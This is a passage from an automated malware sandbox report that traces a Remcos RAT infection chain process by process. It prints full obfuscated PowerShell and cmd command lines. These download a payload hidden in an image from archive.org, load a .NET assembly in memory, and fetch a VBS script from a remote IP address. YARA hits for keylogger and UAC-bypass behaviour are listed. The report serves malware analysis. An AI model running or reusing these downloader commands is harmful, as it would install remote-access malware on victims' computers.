                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
                                                      Imagebase:0x13fe50000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:00:56:38
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                                                      Imagebase:0xfff90000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:00:56:39
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:00:56:39
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:00:56:44
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x1170000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:00:56:46
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                      Imagebase:0x13f300000
                                                      File size:13'824 bytes
                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:00:56:50
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                                                      Imagebase:0xff940000
                                                      File size:345'088 bytes
                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:00:56:50
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxv